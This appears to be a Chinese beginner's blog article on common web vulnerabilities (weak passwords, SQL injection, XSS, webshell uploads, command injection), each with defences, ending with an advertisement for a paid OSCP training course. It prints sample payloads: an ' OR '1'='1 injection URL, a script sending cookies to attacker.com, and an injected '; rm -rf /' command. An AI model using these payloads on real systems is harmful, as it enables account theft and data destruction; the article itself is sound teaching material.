弱口令与密码安全问题

THINKMO

01

暴力破解登录（Weak Password Attack）

在某次渗透测试中，测试人员发现一个网站的后台管理系统使用了非常简单的密码 admin123，而且用户名也是常见的 admin。那么攻击者就可以通过暴力破解工具，使用最简单的字典攻击方式遍历尝试大量常见密码，这么简单的密码，攻击者几乎可以瞬间测试成功，然后登录到你们的后台。

那么攻击者测试出密码之后，危害自然是不言而喻的。

危害

攻击者可以通过后台访问和控制系统，执行任意操作，包括删除数据、篡改网站内容、盗取用户数据等。

而且一旦获取了管理员权限，攻击者可能进一步执行恶意代码，甚至对整个服务器进行控制。

如何防护？

1.使用复杂密码：密码应该包含字母、数字和特殊符号，长度建议不少于12位。

2.启用多因素认证（MFA）：即使密码泄露，攻击者也无法轻易突破。

3.定期更新密码：定期更新密码，避免长期使用同一密码。

SQL注入（SQL lnjection）

THINKMO

02

02

使用SQL注入攻击获取用户信息

某电商平台存在一个用户登录接口，用户的用户名和密码通过 URL 参数传递给后端进行查询。攻击者构造恶意 URL，比如使用常见的 ' OR '1'='1 作为用户名和密码传入：

http://example.com/login?username=admin' OR '1'='1'&password=' OR '1'='1

那么后台的 SQL 查询语句就是这样构造的：

SELECT * FROM users WHERE username = 'admin' OR '1'='1' AND password = '';

由于 '1'='1' 始终为真，查询结果将返回所有用户的数据，这就意味着攻击者可以拿到这个用户的密码。

危害

攻击者可以窃取到所有用户的信息，包括用户名、密码和其他敏感数据。

对于攻击者拿到的用户如果没有有效的权限控制，攻击者甚至可以篡改数据库内容，删除或添加数据。

防护要点

1.使用预处理语句（Prepared Statements）：例如在 PHP 中使用 PDO 或 MySQLi 来执行 SQL 查询，防止 SQL 注入。

示例：

$stmt = $pdo->prepare("SELECT * FROM users WHERE username = :username AND password = :password");$stmt->execute(['username' => $username, 'password' => $password]);

2.输入验证和过滤：确保用户输入的数据经过过滤和转义，特别是特殊字符（如 '、"、--）需要转义。

跨站脚本攻击（XSS）

THINKMO

03

03

恶意脚本窃取用户Cookie

某社交网站允许用户输入自己的昵称和个人签名，并在页面上显示出来。攻击者在昵称输入框中输入如下内容：

<script>document.location='http://attacker.com?cookie=' + document.cookie;</script>

当正常用户访问该页面时，嵌入的 JavaScript 脚本会执行，将用户的 Cookie 信息发送到攻击者指定的服务器上，攻击者就能窃取到用户的登录信息。

危害

攻击者能够窃取用户的登录信息、会话 Token 等敏感信息。

若攻击者窃取到管理员的 Cookie，可能获得管理权限，导致系统被完全控制。

防护要点

1.输出编码：在将用户输入内容插入页面时，应该对输入内容进行 HTML 编码，防止脚本执行。

示例：使用 htmlspecialchars() 函数将特殊字符转义。

echo htmlspecialchars($user_input);

2.输入验证：对于所有用户输入的内容进行严格验证，尤其是脚本标签、<script>、<img>、<iframe> 等 HTML 标签。

3.启用 Content Security Policy（CSP）：CSP 可限制浏览器加载脚本的来源，进一步减少 XSS 攻击的风险。

文件上传漏洞

THINKMO

04

04

上传WebShell获得服务器控制

某应用系统允许用户上传图片作为个人头像。攻击者通过上传一个恶意的 .php 文件（比如 shell.php），并通过修改文件扩展名使其看似正常的图片文件（如 .jpg），成功上传到服务器。

上传后的文件可以通过 URL 访问，比如攻击者通过访问 http://example.com/uploads/shell.php，从而获得服务器的控制权限。

危害

攻击者通过 WebShell 获得了对服务器的完全控制，可以执行任意命令，篡改文件、盗取数据或进行进一步的攻击。

可能导致数据泄露、业务中断或系统被黑客控制。

防护要点

1.限制文件类型：对上传的文件类型进行严格检查，仅允许上传特定类型的文件（如 .jpg、.png 等）。

2.文件名检查：对于上传文件的文件名进行验证，禁止包含特殊字符（如 .php、% 等）。

3.限制文件权限：确保上传的文件不具有执行权限，可以通过修改文件目录的权限来实现。

命令注入漏洞（Command Injection）

THINKMO

05

05

命令注入导致系统控制

某网站的管理后台提供了“服务器状态”查看功能，用户可以选择某个服务器并查询其状态。后台的实现代码直接将用户输入拼接到系统命令中：

ping -c 4 $user_input攻击者通过输入 ; rm -rf /，成功将恶意命令注入：ping -c 4 ; rm -rf /

该命令会首先执行 ping 操作，然后执行 rm -rf / 命令，删除服务器上的所有文件。

危害

攻击者可以在服务器上执行任意命令，可能导致系统崩溃或完全丧失数据。

如果攻击者具有足够的权限，还可以篡改系统配置，窃取敏感信息。

防护要点

1.禁止直接执行用户输入的命令：不要直接将用户输入用于构造系统命令。

2.输入验证与过滤：对用户输入进行严格的验证，确保只允许预期的输入类型。

3.最小权限原则：确保应用程序运行时的权限有限，避免执行敏感操作。

这几个是网络安全渗透测试中常见的漏洞，每一种漏洞都有独特的攻击方式，但是也都有防护措施，我们要理解和掌握这些漏洞的原理和防护技巧，从而才能用来攻击或者防御，这几种攻击是启蒙网络安全最基本的几个漏洞，有兴趣可以学习一下。

五、OSCP

OSCP是Kali官方推出的一个认证，没有要求考试的限制（成年即可），国际证书含金量 很高是业内红队最知名的渗透测试专业证书，相对来说获得难度也高，但是相对于没有基础想借考OSCP练基础能力、练渗透测试思维、练实战的人来说也是友好的，我就是当时直接从web开始基础没咋练，就借着这OSCP去扎实的练扎实的学，拿到这个OSCP也就是有红队中级的实力的，到时如果找工作的话就碾压同级拿nisp、cisp等等的，去考这些证书不如一步到位，因为泷羽sec的小羽要考所以泷哥就提前开了这OSCP培训课，但是因为各种靶场各种理论太费时间压力也很大所以才收费，但是价格也是很照顾我们了，那些机构1w+的培训费用，泷羽4000就可以，如果是学生的话提供证明还会优惠500，OSCP理论基础靶场加官方靶场200+将自己的能力真实的得到练习，从信息收集到最终的权限提升，独立机器环境、域环境全方位练习，小羽到时候先考，大家也不用慌张。现在nisp、cisp这些证书人手一个，现在最主要的就是拿到一个有竞争力的证书，与切实的技术与能力，否则在当前网络行业越来越多人涌入的环境下，我们后面的路只会更紧张，所以OSCP越早拿越好，越早拿越吃香（oscp题目难度每年也会提高），如果有想了解泷羽现在OSCP课程的可以联系我。

六、总

在这条道路上虽说走了两个半月，但是每天都在学习，每天都有收获都感受到自己的提升，执行力是决定未来的真正因素，从学习者到一名分享者，然后到最后的开拓者，这是一件非常有意义的事情，不管是为自己还是为国为家都要从这条路上付出努力，成就未来。如果你也正在这条路上前行，不妨互相认识一下，互相学习、互相成长，大家都有着一个共同的目标，向着一个方向共同的努力，那这样未来我国的网络安全行业终究有我们的一席之地！未来世界网络安全上也终究有中国的一席之地！

欢迎大家来认识我。